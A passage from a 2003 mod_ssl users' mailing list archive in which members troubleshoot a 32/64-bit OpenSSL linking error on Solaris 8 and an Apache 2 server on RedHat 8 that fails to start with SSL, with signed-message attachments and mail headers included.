> ld: warning: file /usr/local/ssl/lib/libssl.a(s2_srvr.o): wrong ELF class: ELFCLASS64
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
> ld: warning: file /usr/local/ssl/lib/libcrypto.a(bn_lib.o): wrong ELF class: ELFCLASS64
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
> Undefined                       first referenced
>  symbol                             in file
> d2i_SSL_SESSION                     modules/ssl/libssl.a(ssl_scache_dbm.o)
> SSL_get_verify_mode                 modules/ssl/libssl.a(ssl_engine_kernel.o)
> SSL_library_init                    modules/ssl/libssl.a(ssl_engine_init.o)
[...]

You have build the OpenSSL libraries for Sparc 64 bit.
But the linker doesn't like them.
you build mod_ssl / apache for sparc 32 bit ?


Bye

Goetz

-- 
Goetz Babin-Ebell, TC TrustCenter AG, http://www.trustcenter.de
Sonninstr. 24-28, 20097 Hamburg, Germany
Tel.: +49-(0)40 80 80 26 -0,  Fax: +49-(0)40 80 80 26 -126

--------------ms010205070001060105020301
Content-Type: application/x-pkcs7-signature; name="smime.p7s"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="smime.p7s"
Content-Description: S/MIME Cryptographic Signature

MIAGCSqGSIb3DQEHAqCAMIACAQExCzAJBgUrDgMCGgUAMIAGCSqGSIb3DQEHAQAAoIIIkDCC
BEQwggOtoAMCAQICDwCQHgAAAAJOQu0jEgf3pTANBgkqhkiG9w0BAQUFADCBvDELMAkGA1UE
BhMCREUxEDAOBgNVBAgTB0hhbWJ1cmcxEDAOBgNVBAcTB0hhbWJ1cmcxOjA4BgNVBAoTMVRD
IFRydXN0Q2VudGVyIGZvciBTZWN1cml0eSBpbiBEYXRhIE5ldHdvcmtzIEdtYkgxIjAgBgNV
BAsTGVRDIFRydXN0Q2VudGVyIENsYXNzIDMgQ0ExKTAnBgkqhkiG9w0BCQEWGmNlcnRpZmlj
YXRlQHRydXN0Y2VudGVyLmRlMB4XDTAzMDIxMDE0NDI1MFoXDTA0MDIxMDE0NDI1MFowgaox
CzAJBgNVBAYTAkRFMRAwDgYDVQQIEwdIYW1idXJnMRAwDgYDVQQHEwdIYW1idXJnMRowGAYD
VQQKExFUQyBUcnVzdENlbnRlciBBRzEUMBIGA1UECxMLRW50d2lja2x1bmcxGjAYBgNVBAMT
EUdvZXR6IEJhYmluLUViZWxsMSkwJwYJKoZIhvcNAQkBFhpiYWJpbi1lYmVsbEB0cnVzdGNl
bnRlci5kZTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBALB6adN6EChrpAbT5KV1
ceRRIDAoGnz2gsBoFI2BwJLS+RpuIZfdJOepm4crg3X6LXrMKwSF/lshFeHrVPtLzabgLGyF
SujsJP0z3u7f4XNYCGHl4UbyPkYboIP9GC/DRtsknO1YfJUy/4yKBG4VjJ4AP6vZTEQey6jm
xelsK2ek4vwRfUjs/z9UcZmtj4ipiHP6IqFyydDTLarn1jWHUu2zFnJzryZ6mXdOUPihCOFG
D+c1KFksZ1VscgDpKygTQcIg/VItmbeFkhOj9IkboOyiVKvvfhujlxmdm9ACt22MjMrB0RAb
9TR1DgXlyofwykKAK+GM8Cu8jcKaJjvfhaMCAwEAAaOB0zCB0DAMBgNVHRMBAf8EAjAAMA4G
A1UdDwEB/wQEAwIF4DA+BglghkgBhvhCAQgEMRYvaHR0cDovL3d3dy50cnVzdGNlbnRlci5k
ZS9ndWlkZWxpbmVzL2luZGV4Lmh0bWwwEQYJYIZIAYb4QgEBBAQDAgWgMF0GCWCGSAGG+EIB
AwRQFk5odHRwczovL3d3dy50cnVzdGNlbnRlci5kZS9jZ2ktYmluL2NoZWNrLXJldi5jZ2kv
OTAxRTAwMDAwMDAyNEU0MkVEMjMxMjA3RjdBNT8wDQYJKoZIhvcNAQEFBQADgYEAObOwuCFG
0HmVvCm8llpJ3qsBqtZgFyUT0wuz8JG6CZjHn5lwvOg+8m8huKrE5oGEQIo9EwLcFLDNVsxB
CiwjX2juU3JQl2Hs2smUyHkOqg+W0COetRp+PcDAk4hk0Mth5A3bDy3FrzyhbjpYjAZTvnsY
9+QYmJm5cGWBJK9I7kIwggREMIIDraADAgECAg8AkB4AAAACTkLtIxIH96UwDQYJKoZIhvcN
AQEFBQAwgbwxCzAJBgNVBAYTAkRFMRAwDgYDVQQIEwdIYW1idXJnMRAwDgYDVQQHEwdIYW1i
dXJnMTowOAYDVQQKEzFUQyBUcnVzdENlbnRlciBmb3IgU2VjdXJpdHkgaW4gRGF0YSBOZXR3
b3JrcyBHbWJIMSIwIAYDVQQLExlUQyBUcnVzdENlbnRlciBDbGFzcyAzIENBMSkwJwYJKoZI
hvcNAQkBFhpjZXJ0aWZpY2F0ZUB0cnVzdGNlbnRlci5kZTAeFw0wMzAyMTAxNDQyNTBaFw0w
NDAyMTAxNDQyNTBaMIGqMQswCQYDVQQGEwJERTEQMA4GA1UECBMHSGFtYnVyZzEQMA4GA1UE
BxMHSGFtYnVyZzEaMBgGA1UEChMRVEMgVHJ1c3RDZW50ZXIgQUcxFDASBgNVBAsTC0VudHdp
Y2tsdW5nMRowGAYDVQQDExFHb2V0eiBCYWJpbi1FYmVsbDEpMCcGCSqGSIb3DQEJARYaYmFi
aW4tZWJlbGxAdHJ1c3RjZW50ZXIuZGUwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB
AQCwemnTehAoa6QG0+SldXHkUSAwKBp89oLAaBSNgcCS0vkabiGX3STnqZuHK4N1+i16zCsE
hf5bIRXh61T7S82m4CxshUro7CT9M97u3+FzWAhh5eFG8j5GG6CD/Rgvw0bbJJztWHyVMv+M
igRuFYyeAD+r2UxEHsuo5sXpbCtnpOL8EX1I7P8/VHGZrY+IqYhz+iKhcsnQ0y2q59Y1h1Lt
sxZyc68mepl3TlD4oQjhRg/nNShZLGdVbHIA6SsoE0HCIP1SLZm3hZITo/SJG6DsolSr734b
o5cZnZvQArdtjIzKwdEQG/U0dQ4F5cqH8MpCgCvhjPArvI3CmiY734WjAgMBAAGjgdMwgdAw
DAYDVR0TAQH/BAIwADAOBgNVHQ8BAf8EBAMCBeAwPgYJYIZIAYb4QgEIBDEWL2h0dHA6Ly93
d3cudHJ1c3RjZW50ZXIuZGUvZ3VpZGVsaW5lcy9pbmRleC5odG1sMBEGCWCGSAGG+EIBAQQE
AwIFoDBdBglghkgBhvhCAQMEUBZOaHR0cHM6Ly93d3cudHJ1c3RjZW50ZXIuZGUvY2dpLWJp
bi9jaGVjay1yZXYuY2dpLzkwMUUwMDAwMDAwMjRFNDJFRDIzMTIwN0Y3QTU/MA0GCSqGSIb3
DQEBBQUAA4GBADmzsLghRtB5lbwpvJZaSd6rAarWYBclE9MLs/CRugmYx5+ZcLzoPvJvIbiq
xOaBhECKPRMC3BSwzVbMQQosI19o7lNyUJdh7NrJlMh5DqoPltAjnrUafj3AwJOIZNDLYeQN
2w8txa88oW46WIwGU757GPfkGJiZuXBlgSSvSO5CMYIEdzCCBHMCAQEwgdAwgbwxCzAJBgNV
BAYTAkRFMRAwDgYDVQQIEwdIYW1idXJnMRAwDgYDVQQHEwdIYW1idXJnMTowOAYDVQQKEzFU
QyBUcnVzdENlbnRlciBmb3IgU2VjdXJpdHkgaW4gRGF0YSBOZXR3b3JrcyBHbWJIMSIwIAYD
VQQLExlUQyBUcnVzdENlbnRlciBDbGFzcyAzIENBMSkwJwYJKoZIhvcNAQkBFhpjZXJ0aWZp
Y2F0ZUB0cnVzdGNlbnRlci5kZQIPAJAeAAAAAk5C7SMSB/elMAkGBSsOAwIaBQCgggJ7MBgG
CSqGSIb3DQEJAzELBgkqhkiG9w0BBwEwHAYJKoZIhvcNAQkFMQ8XDTAzMDMxNzE2NDExMlow
IwYJKoZIhvcNAQkEMRYEFCRQO7jB03ES2yDuTsofMRNfKyC4MFIGCSqGSIb3DQEJDzFFMEMw
CgYIKoZIhvcNAwcwDgYIKoZIhvcNAwICAgCAMA0GCCqGSIb3DQMCAgFAMAcGBSsOAwIHMA0G
CCqGSIb3DQMCAgEoMIHhBgkrBgEEAYI3EAQxgdMwgdAwgbwxCzAJBgNVBAYTAkRFMRAwDgYD
VQQIEwdIYW1idXJnMRAwDgYDVQQHEwdIYW1idXJnMTowOAYDVQQKEzFUQyBUcnVzdENlbnRl
ciBmb3IgU2VjdXJpdHkgaW4gRGF0YSBOZXR3b3JrcyBHbWJIMSIwIAYDVQQLExlUQyBUcnVz
dENlbnRlciBDbGFzcyAzIENBMSkwJwYJKoZIhvcNAQkBFhpjZXJ0aWZpY2F0ZUB0cnVzdGNl
bnRlci5kZQIPAJAeAAAAAk5C7SMSB/elMIHjBgsqhkiG9w0BCRACCzGB06CB0DCBvDELMAkG
A1UEBhMCREUxEDAOBgNVBAgTB0hhbWJ1cmcxEDAOBgNVBAcTB0hhbWJ1cmcxOjA4BgNVBAoT
MVRDIFRydXN0Q2VudGVyIGZvciBTZWN1cml0eSBpbiBEYXRhIE5ldHdvcmtzIEdtYkgxIjAg
BgNVBAsTGVRDIFRydXN0Q2VudGVyIENsYXNzIDMgQ0ExKTAnBgkqhkiG9w0BCQEWGmNlcnRp
ZmljYXRlQHRydXN0Y2VudGVyLmRlAg8AkB4AAAACTkLtIxIH96UwDQYJKoZIhvcNAQEBBQAE
ggEAILZf/GuZIoIND2ZIv6fDHZUp9LK0GDo9JBLcJZmTRl5lnqAtaJN2Zv//TjSUC9Pdp04s
QIv6fIwViU+HeFUm0xnmXtYQZn3trA3LCdSeZrXE8nQlYDT5iNTJGZJqTIugGNa6M26nDoQQ
CWUbCwN3C6hwE/YI13K4tq7MHxW4VHdEbiDutCDEZajbw3T+Hh03xQgDAGNUUsLoOoLNzvj3
merOOD54T9SiIPb6JV+3CHnT5QJmMtKK9bo/2JKWpupAsWE64v4+Kq55rVCgeA6ZFcJpktel
9phTPqq9468xkkn35rz68tqlPA1u4TJ43MrWnxm4B3Po+luCW9aRYeLyDQAAAAAAAA==
--------------ms010205070001060105020301--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Mar 17 17:47:40 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 31B772AA038; Mon, 17 Mar 2003 17:47:40 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail.cse.psu.edu (psuvax1.cse.psu.edu [130.203.4.6])
	by master.modssl.org (Postfix) with ESMTP id C74D42AA01F
	for ; Mon, 17 Mar 2003 17:47:38 +0100 (CET)
Received: from corona.cse.psu.edu (corona.cse.psu.edu [130.203.4.52])
	by mail.cse.psu.edu (CSE Mail Server) with ESMTP id C7CE9199E4
	for ; Mon, 17 Mar 2003 11:47:34 -0500 (EST)
Received: by corona.cse.psu.edu (Postfix Null Client, from userid 2711)
	id D11DA3973A; Mon, 17 Mar 2003 11:47:33 -0500 (EST)
Subject: Re: Apache/mod_ssl not compiling, Solaris 8
To: modssl-users@modssl.org
Date: Mon, 17 Mar 2003 11:47:33 -0500 (EST)
From: "Nathan Coraor" 
In-Reply-To: <3E75FAA7.4070808@trustcenter.de> from "=?ISO-8859-1?Q?G=F6tz_Babin-Ebell?=" at Mar 17, 2003 05:41:11 PM
X-Mailer: ELM [version 2.5 PL6]
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-Id: <20030317164733.D11DA3973A@corona.cse.psu.edu>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Nathan Coraor" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

"=?ISO-8859-1?Q?G=F6tz_Babin-Ebell?=" said:
> 
> > ld: warning: file /usr/local/ssl/lib/libssl.a(s2_srvr.o): wrong ELF class: ELFCLASS64
> ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
> > ld: warning: file /usr/local/ssl/lib/libcrypto.a(bn_lib.o): wrong ELF class: ELFCLASS64
> ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
> 
> You have build the OpenSSL libraries for Sparc 64 bit.
> But the linker doesn't like them.
> you build mod_ssl / apache for sparc 32 bit ?
> 
> 

  Goetz,

  That's what it looked like to me, however, I'm not sure how to build
  apache/mod_ssl 64 bit.  Is there a configuration option that needs to
  be passed for this?  Can it not be compiled 64 bit?

Thanks,
--nate
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Mar 17 19:00:19 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 096002AA035; Mon, 17 Mar 2003 19:00:18 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mystic1.trustcenter.de (mystic1.trustcenter.de [193.194.157.34])
	by master.modssl.org (Postfix) with ESMTP id 505D92AA01A
	for ; Mon, 17 Mar 2003 19:00:17 +0100 (CET)
Received: (from root@localhost)
	by mystic1.trustcenter.de (8.10.2+Sun/8.10.2) id h2HHwX713935
	for ; Mon, 17 Mar 2003 18:58:33 +0100 (MET)
Received: from venus.trustcenter.de(192.168.202.4) by mystic1.trustcenter.de via csmap (V6.0)
	id srcAAAfNaWnB; Mon, 17 Mar 03 18:58:31 +0100
Received: from trustcenter.de (titan.trustcenter.de [192.168.200.244])
	by venus.trustcenter.de (8.11.0/8.11.0) with ESMTP id h2HI0BM19317;
	Mon, 17 Mar 2003 19:00:11 +0100 (MET)
Message-ID: <3E760D2A.3070701@trustcenter.de>
Date: Mon, 17 Mar 2003 19:00:10 +0100
From: =?ISO-8859-1?Q?G=F6tz_Babin-Ebell?= 
Organization: TC TrustCenter AG
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.2.1) Gecko/20021130
X-Accept-Language: de-de, de, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: Apache/mod_ssl not compiling, Solaris 8
References: <20030317164733.D11DA3973A@corona.cse.psu.edu>
In-Reply-To: <20030317164733.D11DA3973A@corona.cse.psu.edu>
Content-Type: multipart/signed; protocol="application/x-pkcs7-signature"; micalg=sha1; boundary="------------ms020400040806050301000601"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: =?ISO-8859-1?Q?G=F6tz_Babin-Ebell?= 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a cryptographically signed message in MIME format.

--------------ms020400040806050301000601
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit

Hello Nathan,

Nathan Coraor wrote:
> "=?ISO-8859-1?Q?G=F6tz_Babin-Ebell?=" said:
>>>ld: warning: file /usr/local/ssl/lib/libssl.a(s2_srvr.o): wrong ELF class: ELFCLASS64
>>^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
>>>ld: warning: file /usr/local/ssl/lib/libcrypto.a(bn_lib.o): wrong ELF class: ELFCLASS64
>>^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

>>You have build the OpenSSL libraries for Sparc 64 bit.
>>But the linker doesn't like them.
>>you build mod_ssl / apache for sparc 32 bit ?

>   That's what it looked like to me, however, I'm not sure how to build
>   apache/mod_ssl 64 bit.  Is there a configuration option that needs to
>   be passed for this?  Can it not be compiled 64 bit?

I don't know.

If there is no way to build apache/modssl 64 bit,
you have to build OpenSSL 32 bit...

Bye

Goetz

-- 
Goetz Babin-Ebell, TC TrustCenter AG, http://www.trustcenter.de
Sonninstr. 24-28, 20097 Hamburg, Germany
Tel.: +49-(0)40 80 80 26 -0,  Fax: +49-(0)40 80 80 26 -126

--------------ms020400040806050301000601
Content-Type: application/x-pkcs7-signature; name="smime.p7s"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="smime.p7s"
Content-Description: S/MIME Cryptographic Signature

MIAGCSqGSIb3DQEHAqCAMIACAQExCzAJBgUrDgMCGgUAMIAGCSqGSIb3DQEHAQAAoIIIkDCC
BEQwggOtoAMCAQICDwCQHgAAAAJOQu0jEgf3pTANBgkqhkiG9w0BAQUFADCBvDELMAkGA1UE
BhMCREUxEDAOBgNVBAgTB0hhbWJ1cmcxEDAOBgNVBAcTB0hhbWJ1cmcxOjA4BgNVBAoTMVRD
IFRydXN0Q2VudGVyIGZvciBTZWN1cml0eSBpbiBEYXRhIE5ldHdvcmtzIEdtYkgxIjAgBgNV
BAsTGVRDIFRydXN0Q2VudGVyIENsYXNzIDMgQ0ExKTAnBgkqhkiG9w0BCQEWGmNlcnRpZmlj
YXRlQHRydXN0Y2VudGVyLmRlMB4XDTAzMDIxMDE0NDI1MFoXDTA0MDIxMDE0NDI1MFowgaox
CzAJBgNVBAYTAkRFMRAwDgYDVQQIEwdIYW1idXJnMRAwDgYDVQQHEwdIYW1idXJnMRowGAYD
VQQKExFUQyBUcnVzdENlbnRlciBBRzEUMBIGA1UECxMLRW50d2lja2x1bmcxGjAYBgNVBAMT
EUdvZXR6IEJhYmluLUViZWxsMSkwJwYJKoZIhvcNAQkBFhpiYWJpbi1lYmVsbEB0cnVzdGNl
bnRlci5kZTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBALB6adN6EChrpAbT5KV1
ceRRIDAoGnz2gsBoFI2BwJLS+RpuIZfdJOepm4crg3X6LXrMKwSF/lshFeHrVPtLzabgLGyF
SujsJP0z3u7f4XNYCGHl4UbyPkYboIP9GC/DRtsknO1YfJUy/4yKBG4VjJ4AP6vZTEQey6jm
xelsK2ek4vwRfUjs/z9UcZmtj4ipiHP6IqFyydDTLarn1jWHUu2zFnJzryZ6mXdOUPihCOFG
D+c1KFksZ1VscgDpKygTQcIg/VItmbeFkhOj9IkboOyiVKvvfhujlxmdm9ACt22MjMrB0RAb
9TR1DgXlyofwykKAK+GM8Cu8jcKaJjvfhaMCAwEAAaOB0zCB0DAMBgNVHRMBAf8EAjAAMA4G
A1UdDwEB/wQEAwIF4DA+BglghkgBhvhCAQgEMRYvaHR0cDovL3d3dy50cnVzdGNlbnRlci5k
ZS9ndWlkZWxpbmVzL2luZGV4Lmh0bWwwEQYJYIZIAYb4QgEBBAQDAgWgMF0GCWCGSAGG+EIB
AwRQFk5odHRwczovL3d3dy50cnVzdGNlbnRlci5kZS9jZ2ktYmluL2NoZWNrLXJldi5jZ2kv
OTAxRTAwMDAwMDAyNEU0MkVEMjMxMjA3RjdBNT8wDQYJKoZIhvcNAQEFBQADgYEAObOwuCFG
0HmVvCm8llpJ3qsBqtZgFyUT0wuz8JG6CZjHn5lwvOg+8m8huKrE5oGEQIo9EwLcFLDNVsxB
CiwjX2juU3JQl2Hs2smUyHkOqg+W0COetRp+PcDAk4hk0Mth5A3bDy3FrzyhbjpYjAZTvnsY
9+QYmJm5cGWBJK9I7kIwggREMIIDraADAgECAg8AkB4AAAACTkLtIxIH96UwDQYJKoZIhvcN
AQEFBQAwgbwxCzAJBgNVBAYTAkRFMRAwDgYDVQQIEwdIYW1idXJnMRAwDgYDVQQHEwdIYW1i
dXJnMTowOAYDVQQKEzFUQyBUcnVzdENlbnRlciBmb3IgU2VjdXJpdHkgaW4gRGF0YSBOZXR3
b3JrcyBHbWJIMSIwIAYDVQQLExlUQyBUcnVzdENlbnRlciBDbGFzcyAzIENBMSkwJwYJKoZI
hvcNAQkBFhpjZXJ0aWZpY2F0ZUB0cnVzdGNlbnRlci5kZTAeFw0wMzAyMTAxNDQyNTBaFw0w
NDAyMTAxNDQyNTBaMIGqMQswCQYDVQQGEwJERTEQMA4GA1UECBMHSGFtYnVyZzEQMA4GA1UE
BxMHSGFtYnVyZzEaMBgGA1UEChMRVEMgVHJ1c3RDZW50ZXIgQUcxFDASBgNVBAsTC0VudHdp
Y2tsdW5nMRowGAYDVQQDExFHb2V0eiBCYWJpbi1FYmVsbDEpMCcGCSqGSIb3DQEJARYaYmFi
aW4tZWJlbGxAdHJ1c3RjZW50ZXIuZGUwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB
AQCwemnTehAoa6QG0+SldXHkUSAwKBp89oLAaBSNgcCS0vkabiGX3STnqZuHK4N1+i16zCsE
hf5bIRXh61T7S82m4CxshUro7CT9M97u3+FzWAhh5eFG8j5GG6CD/Rgvw0bbJJztWHyVMv+M
igRuFYyeAD+r2UxEHsuo5sXpbCtnpOL8EX1I7P8/VHGZrY+IqYhz+iKhcsnQ0y2q59Y1h1Lt
sxZyc68mepl3TlD4oQjhRg/nNShZLGdVbHIA6SsoE0HCIP1SLZm3hZITo/SJG6DsolSr734b
o5cZnZvQArdtjIzKwdEQG/U0dQ4F5cqH8MpCgCvhjPArvI3CmiY734WjAgMBAAGjgdMwgdAw
DAYDVR0TAQH/BAIwADAOBgNVHQ8BAf8EBAMCBeAwPgYJYIZIAYb4QgEIBDEWL2h0dHA6Ly93
d3cudHJ1c3RjZW50ZXIuZGUvZ3VpZGVsaW5lcy9pbmRleC5odG1sMBEGCWCGSAGG+EIBAQQE
AwIFoDBdBglghkgBhvhCAQMEUBZOaHR0cHM6Ly93d3cudHJ1c3RjZW50ZXIuZGUvY2dpLWJp
bi9jaGVjay1yZXYuY2dpLzkwMUUwMDAwMDAwMjRFNDJFRDIzMTIwN0Y3QTU/MA0GCSqGSIb3
DQEBBQUAA4GBADmzsLghRtB5lbwpvJZaSd6rAarWYBclE9MLs/CRugmYx5+ZcLzoPvJvIbiq
xOaBhECKPRMC3BSwzVbMQQosI19o7lNyUJdh7NrJlMh5DqoPltAjnrUafj3AwJOIZNDLYeQN
2w8txa88oW46WIwGU757GPfkGJiZuXBlgSSvSO5CMYIEdzCCBHMCAQEwgdAwgbwxCzAJBgNV
BAYTAkRFMRAwDgYDVQQIEwdIYW1idXJnMRAwDgYDVQQHEwdIYW1idXJnMTowOAYDVQQKEzFU
QyBUcnVzdENlbnRlciBmb3IgU2VjdXJpdHkgaW4gRGF0YSBOZXR3b3JrcyBHbWJIMSIwIAYD
VQQLExlUQyBUcnVzdENlbnRlciBDbGFzcyAzIENBMSkwJwYJKoZIhvcNAQkBFhpjZXJ0aWZp
Y2F0ZUB0cnVzdGNlbnRlci5kZQIPAJAeAAAAAk5C7SMSB/elMAkGBSsOAwIaBQCgggJ7MBgG
CSqGSIb3DQEJAzELBgkqhkiG9w0BBwEwHAYJKoZIhvcNAQkFMQ8XDTAzMDMxNzE4MDAxMFow
IwYJKoZIhvcNAQkEMRYEFCmf1NL8HvDm3yJ197lenq4nLOXVMFIGCSqGSIb3DQEJDzFFMEMw
CgYIKoZIhvcNAwcwDgYIKoZIhvcNAwICAgCAMA0GCCqGSIb3DQMCAgFAMAcGBSsOAwIHMA0G
CCqGSIb3DQMCAgEoMIHhBgkrBgEEAYI3EAQxgdMwgdAwgbwxCzAJBgNVBAYTAkRFMRAwDgYD
VQQIEwdIYW1idXJnMRAwDgYDVQQHEwdIYW1idXJnMTowOAYDVQQKEzFUQyBUcnVzdENlbnRl
ciBmb3IgU2VjdXJpdHkgaW4gRGF0YSBOZXR3b3JrcyBHbWJIMSIwIAYDVQQLExlUQyBUcnVz
dENlbnRlciBDbGFzcyAzIENBMSkwJwYJKoZIhvcNAQkBFhpjZXJ0aWZpY2F0ZUB0cnVzdGNl
bnRlci5kZQIPAJAeAAAAAk5C7SMSB/elMIHjBgsqhkiG9w0BCRACCzGB06CB0DCBvDELMAkG
A1UEBhMCREUxEDAOBgNVBAgTB0hhbWJ1cmcxEDAOBgNVBAcTB0hhbWJ1cmcxOjA4BgNVBAoT
MVRDIFRydXN0Q2VudGVyIGZvciBTZWN1cml0eSBpbiBEYXRhIE5ldHdvcmtzIEdtYkgxIjAg
BgNVBAsTGVRDIFRydXN0Q2VudGVyIENsYXNzIDMgQ0ExKTAnBgkqhkiG9w0BCQEWGmNlcnRp
ZmljYXRlQHRydXN0Y2VudGVyLmRlAg8AkB4AAAACTkLtIxIH96UwDQYJKoZIhvcNAQEBBQAE
ggEAluCVM7W5qIOosw/9gE5BxU60nu53gzmjRJCbNR3gnCAywmJ3qGRoGznEunkOXXzizQ3e
hScRzb5i6oyLP1Z9ToPoIQ5V2rQx47hWSQJ9MiROIlIEYxVMKnzZkvMDoXpC+PSVR6nL3VaU
Kwylv2/O+cPjn+mAz6SMvHFra8qNeWa7M0OIGW8UXik4t+GJIwECSHaBsHMSTvsoZ2jyy/jf
j0AO3oZGanyZM43/Ah5c7JWEqoaEbLULylU0pXZOxdxr/0gyy3/C1kCyfnEtSDb2hmTnk1wW
XoH+VBVB9Rjakcf1O1E2GXtgz0RMN8pTiNx5c1nXCluZ5NdpP+SaVYTnYQAAAAAAAA==
--------------ms020400040806050301000601--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Mar 17 20:37:25 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 75C322AA038; Mon, 17 Mar 2003 20:37:25 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from smx-chi04.fnis.com (smtp02.microgeneral.com [206.54.145.18])
	by master.modssl.org (Postfix) with ESMTP id 0B17C2AA01F
	for ; Mon, 17 Mar 2003 20:37:24 +0100 (CET)
Received: from MailHUB1.fnf.com ([10.10.4.13]) by 10.248.61.37 with InterScan Messaging Security Suite; Mon, 17 Mar 2003 13:38:04 -0600
Received: by mailhub1.fnf.com with Internet Mail Service (5.5.2653.19)
	id ; Mon, 17 Mar 2003 11:37:18 -0800
Message-ID: 
From: "Mitchell, Edmund" 
To: "'modssl-users@modssl.org'" 
Subject:  How to "start" mod ssl?
Date: Mon, 17 Mar 2003 11:32:04 -0800
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Mitchell, Edmund" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hello all

I just built from source apache 2 on RedHat 8 with this config:
$->./configure --prefix=/usr --exec-prefix=/usr --bindir=/usr/bin
--sbindir=/usr/sbin --enable-mods-shared=all --enable-so --with-mpm=worker
--enable-ssl --with-ssl=/usr/include/openssl
--libexecdir=/usr/lib/httpd/modules --mandir=/usr/share/man
--sysconfdir=/etc/httpd/conf --datadir=/var/www --localstatedir=/var
--disable-imap --disable-dav --disable-dav_fs --disable-speling
--disable-autoindex

and it went smoothly, as did make and make install.

I tried to startssl, but it complained about the cert and key file, so I
 built those using the makefile that RedHat provides to build dummy certs
and
 keys, and that went smoothly.  It then complained about the DocumentRoot,
so
 I fixed that, and now it doesn't complain, but nothing happens.

#->/usr/sbin/apachectl startssl
#->ps -eaf | grep httpd
root     19590 19172  0 13:53 pts/1    00:00:00 grep httpd

#->/usr/sbin/httpd -DSSL
#->ps -eaf | grep httpd
root     19594 19172  0 13:53 pts/1    00:00:00 grep httpd

I figured it was a weird situation so I tore out everything, and rebuilt
from
scratch.  Twice, and yes, both times I md5summed the tarball.

However, each time, if I don't start ssl, it works:

#->/usr/sbin/httpd -k start
#->ps -eaf | grep httpd
root     19597     1  0 13:56 ?        00:00:00 /usr/sbin/httpd -k start
nobody   19598 19597  0 13:56 ?        00:00:00 /usr/sbin/httpd -k start
nobody   19599 19597  0 13:56 ?        00:00:00 /usr/sbin/httpd -k start
nobody   19600 19597  1 13:56 ?        00:00:00 /usr/sbin/httpd -k start
root     19658 19172  0 13:56 pts/1    00:00:00 grep httpd

and then, I can connect to localhost, but not to port 443, even though I
have
no firewall at all.

#->/sbin/iptables --list
Chain INPUT (policy ACCEPT)
target     prot opt source               destination

Chain FORWARD (policy ACCEPT)
target     prot opt source               destination

Chain OUTPUT (policy ACCEPT)
target     prot opt source               destination

#->/usr/bin/openssl s_client -connect localhost:80
CONNECTED(00000003)
19856:error:140770FC:SSL routines:SSL23_GET_SERVER_HELLO:unknown
protocol:s23_clnt.c:460:

#->/usr/bin/openssl s_client -connect localhost:443
connect: Connection refused
connect:errno=29

The syntax seems to be OK; I haven't changed anything but what I mentioned
above -

#->/usr/sbin/httpd -t
Syntax OK
#->/usr/sbin/httpd -S
VirtualHost configuration:
Syntax OK

I'm (obviously) new to this whole thing, so I'd be grateful if anyone who's
been through this before can steer me in the right direction.

Thanks for your time

E

-------------------------------------------------------
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

